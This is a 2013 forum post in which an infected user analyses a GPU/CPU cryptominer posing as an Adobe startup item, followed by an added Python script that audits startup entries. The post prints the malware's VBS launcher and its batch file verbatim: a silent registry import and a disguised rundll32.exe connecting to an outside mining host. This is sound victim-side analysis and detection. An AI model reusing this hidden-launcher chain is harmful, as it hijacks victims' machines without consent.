Firstly, I would like to ask, did you find anything and if so, what?
Then, unfortunately, I seem to be experiencing the exact same problem as you, and I did do a little manual digging, which resulted in the following knowledge:
The program has added itself to the startup of the system; under msconfig, Startup, look for
Startup item: Adobe; Manufacturer: Unknown; Command: c:\programdata\adob\color.vbs (un-marking it may yield results, with it not starting at least, but I am not sure if there are other safeguards in place)
Now OBVIOUSLY this has nothing to do with Adobe, especially since I don't have any product of theirs, not even the Flash Player, and besides, the real Adobe folder would be c:\programdata\Adobe, checked on a friend's PC.
That color.vbs is a visual basic script file and peering inside reveals it does the following:
Set WshShell = CreateObject("WScript.Shell")
' Run start.bat with a hidden window (0) and without waiting for it to finish (false)
WshShell.Run "C:\ProgramData\adob\start.bat", 0, false
Which translates to running start.bat in that folder, if I'm not mistaken. The code in the bat file is:
REM silently import 123.reg from the current folder
regedit.exe /s 123.reg
REM send 60 echo requests to localhost
ping 127.0.0.1 -n 60
REM run the rundll32.exe in this folder with the arguments shown
rundll32.exe -k phatk -o http://ferm.chickenkiller.com:80 -u ferm1 -p 12345 -I 1
So it opens up Windows' registry editor and adds (after looking in the mentioned registry file)
It then proceeds to ping your localhost 60 times. Why? Who knows.
("127.0.0.1 is the loopback Internet protocol (IP) address also referred to as the “localhost.” The loopback construct gives a computer or device capable of networking the capability to validate or establish the IP stack on the machine.")
Then it changes the directory it is working in to C:/ProgramData/adob and proceeds to run a custom rundll32.exe (from that directory). Note, this is NOT the rundll32 Windows uses; Windows uses the one in the System32 folder, although that one can also become infected of course. IF and how this exe file was customized remains a hexadecimal mystery; that is because I can only view the code in hexadecimal, and from that I can't really tell you anything at all.
If I remember correctly, the base use of rundll32 is to, well, run dll files, which of course each contain programming code of their own. The 3 dll files this specific folder is
Also present are 2 bin files,
phatk110722GeForce GTX 580v1w256long4.bin
Now phatk110722GeForce GTX 580v1w256long4.bin will most definitely differ between different PCs, because it names the GPU currently in the machine (at least for me it does).
Sigh, now Poclbm (PyOpenCL Bitcoin miner) is a Python GPU Bitcoin miner that uses the OpenCL framework to quickly perform the hashing computations. Works with AMD 4xxx and up, Nvidia 8xxx and up, video cards.
But this is not what we are dealing with; this guy is simply using code from the open source project to do hashing computations? On our GPUs? If I were to take an extremely wild guess here, that is. Some PCs might not really be all that affected then, as some GPUs aren't supported. But I digress. I am a bit tired and will probably look into it further tomorrow.
Also, terminating the rundll32.exe process that is eating up our CPUs and perhaps GPUs seems to stop the problem until you restart (but removing it from startup in msconfig should fix that; regardless, this might just be the tip of the iceberg, and as such I need to know more about what this thing is actually doing, for the sake of my sanity).
Edited by qwynbleid, 03 January 2013 - 05:54 PM.
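As an added defender's example (not part of the post above or of any tool it names), here is a Python audit that flags the startup-entry traits the post describes: a .vbs launcher living in ProgramData, a folder name one letter off a real vendor (adob vs Adobe), an entry named after a vendor whose manufacturer msconfig shows as Unknown, and a rundll32.exe sitting outside System32. The entries it scans are constructed inline; on a real machine they would come from msconfig or the Run keys.

```python
"""Startup-entry audit for the traits described in the post above.
Added example, not the post's own code; the ENTRIES below are constructed."""
import re
from difflib import SequenceMatcher

KNOWN_VENDORS = {"adobe", "microsoft", "nvidia", "intel", "google"}
SYSTEM_BINARIES = {"rundll32.exe", "regsvr32.exe", "svchost.exe", "wscript.exe"}
SCRIPT_EXTS = (".vbs", ".bat", ".cmd", ".js", ".ps1")
USER_WRITABLE = ("\\programdata\\", "\\appdata\\", "\\temp\\", "\\users\\")
SYSTEM_DIRS = ("\\windows\\system32\\", "\\windows\\syswow64\\")

def audit_entry(name, manufacturer, command):
    """Return a list of (category, detail) findings for one startup entry."""
    findings = []
    # First token of the command line, honouring a quoted path with spaces.
    m = re.match(r'"([^"]+)"|(\S+)', command.strip())
    path = (m.group(1) or m.group(2)) if m else ""
    norm = path.replace("/", "\\").lower()
    folders, base = norm.split("\\")[:-1], norm.rsplit("\\", 1)[-1]
    # 1. A .vbs/.bat launcher living in a user-writable directory.
    if base.endswith(SCRIPT_EXTS) and any(d in norm for d in USER_WRITABLE):
        findings.append(("script-in-writable-dir", path))
    # 2. A folder whose name is close to, but not equal to, a known vendor.
    for folder in folders:
        for vendor in KNOWN_VENDORS:
            ratio = SequenceMatcher(None, folder, vendor).ratio()
            if folder != vendor and ratio >= 0.8:
                findings.append(("vendor-lookalike-folder", f"{folder} ~ {vendor}"))
    # 3. A system binary name (rundll32.exe ...) outside the Windows system dirs.
    if base in SYSTEM_BINARIES and not any(d in norm for d in SYSTEM_DIRS):
        findings.append(("system-binary-outside-system32", path))
    # 4. Entry named after a vendor while msconfig shows the manufacturer as Unknown.
    if manufacturer.lower() == "unknown" and name.lower() in KNOWN_VENDORS:
        findings.append(("unknown-manufacturer-vendor-name", name))
    return findings

# Constructed sample entries in msconfig's (item, manufacturer, command) shape.
ENTRIES = [
    ("Adobe", "Unknown", r"c:\programdata\adob\color.vbs"),
    ("Updater", "Unknown", r"C:\ProgramData\adob\rundll32.exe"),
    ("Adobe Updater", "Adobe Systems", r'"C:\Program Files\Adobe\update.exe" /quiet'),
    ("Shell", "Microsoft", r"C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL"),
]

def audit_all(entries):
    """Map each entry's command to its findings; clean entries map to []."""
    return {cmd: audit_entry(n, m, cmd) for n, m, cmd in entries}
```

Running `audit_all(ENTRIES)` flags the two adob entries and leaves the genuine Adobe and System32 entries clean.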